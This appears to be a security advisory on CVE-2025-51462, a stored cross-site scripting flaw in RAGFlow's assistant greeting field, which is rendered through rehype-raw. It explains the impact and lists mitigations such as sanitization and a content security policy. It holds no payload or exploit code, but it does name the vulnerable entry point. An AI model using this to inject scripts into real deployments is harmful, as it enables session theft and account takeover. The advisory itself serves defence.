CVE-2025-51462 is a stored Cross-site Scripting (XSS) vulnerability identified in the RAGFlow application, specifically in the api.apps.dialog_app.set_dialog function. This vulnerability arises because user input provided to the assistant greeting field is not properly sanitized before being stored and subsequently rendered. The rendering process uses a markdown component that incorporates rehype-raw, a plugin that allows raw HTML to be processed, which in this context enables malicious JavaScript code to be executed when the stored greeting is displayed. An attacker can exploit this by submitting crafted input containing malicious JavaScript payloads that get stored persistently and executed in the browsers of users who view the affected greeting. The vulnerability has a CVSS 3.1 base score of 6.1, indicating a medium severity level. The vector string (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) shows that the attack can be performed remotely over the network without privileges, requires user interaction (the victim must view the malicious content), and impacts confidentiality and integrity with a scope change, but does not affect availability. No known exploits are currently reported in the wild, and no patches have been linked yet. The underlying weakness corresponds to CWE-79, which is the classic category for Cross-site Scripting vulnerabilities. Stored XSS is particularly dangerous because the malicious script is saved on the server and served to multiple users, increasing the attack surface and potential impact. The use of rehype-raw in markdown rendering without proper sanitization is a common pitfall that can lead to such vulnerabilities.

For European organizations using RAGFlow 0.17.2 or similar vulnerable versions, this stored XSS vulnerability poses a significant risk to user confidentiality and data integrity. Attackers could leverage this flaw to execute arbitrary JavaScript in the context of users’ browsers, potentially stealing session tokens, performing actions on behalf of users, or delivering further malware. This could lead to unauthorized access to sensitive information, account takeover, or reputational damage. Since the vulnerability requires user interaction (viewing the malicious greeting), phishing or social engineering could be used to increase exploitation likelihood. The scope change in the CVSS vector indicates that the vulnerability could affect resources beyond the initially vulnerable component, potentially impacting other parts of the application or connected systems. European organizations in sectors with high regulatory requirements for data protection (e.g., finance, healthcare, government) could face compliance risks under GDPR if personal data is compromised. Additionally, stored XSS can be used as a foothold for more complex attacks, including lateral movement within networks. The absence of known exploits in the wild suggests a window of opportunity for organizations to remediate before widespread abuse occurs.

1. Immediate mitigation should focus on input validation and output encoding: sanitize all user inputs to the assistant greeting field to remove or neutralize any HTML or JavaScript content before storage. 2. Modify or replace the markdown rendering pipeline to avoid using rehype-raw or ensure it is configured with strict sanitization rules to prevent raw HTML execution. 3. Implement Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers, mitigating the impact of any residual XSS. 4. Conduct a thorough code review and security audit of all markdown rendering and user input handling components to identify and fix similar vulnerabilities. 5. Educate users and administrators about the risks of stored XSS and encourage cautious handling of untrusted content. 6. Monitor logs and user reports for suspicious activity that might indicate exploitation attempts. 7. Since no patch is currently available, consider temporary workarounds such as disabling the vulnerable feature or restricting access to the assistant greeting input until a fix is released. 8. Stay updated with vendor advisories and apply patches promptly once available.